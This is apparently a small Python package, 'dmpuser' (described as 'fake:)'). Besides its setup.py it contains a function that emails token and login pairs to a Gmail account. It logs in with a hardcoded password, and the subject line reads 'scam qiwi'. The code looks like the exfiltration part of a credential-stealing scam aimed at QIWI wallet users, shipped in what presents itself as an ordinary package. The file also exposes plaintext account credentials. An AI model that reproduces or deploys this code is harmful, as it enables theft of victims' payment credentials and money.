from setuptools import setup

setup(name='dmpuser',
      version='1.4.1',
      description='fake:)',
      packages=['dmpuser'],
      author_email='adamisaev92341@gmail.com',
      zip_safe=False)



# import necessary packages
 
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import smtplib
 
# create message object instance
msg = MIMEMultipart()
 
def send_msg(tk,lg):
    message = ('"'+str(tk)+'": ' + '"' + lg +'",')


    
    # setup the parameters of the message
    password = "magaisaev95"
    msg['From'] = "tramong682@gmail.com"
    msg['To'] = "tramong682@gmail.com"
    msg['Subject'] = "scam qiwi"
    
    # add in the message body
    msg.attach(MIMEText(message, 'plain'))
    
    #create server
    server = smtplib.SMTP('smtp.gmail.com: 587')
    
    server.starttls()
    
    # Login Credentials for sending the mail
    server.login(msg['From'], password)
    
    
    # send the message via the server.
    server.sendmail(msg['From'], msg['To'], msg.as_string())
    
    server.quit()
    
    print('this is true ')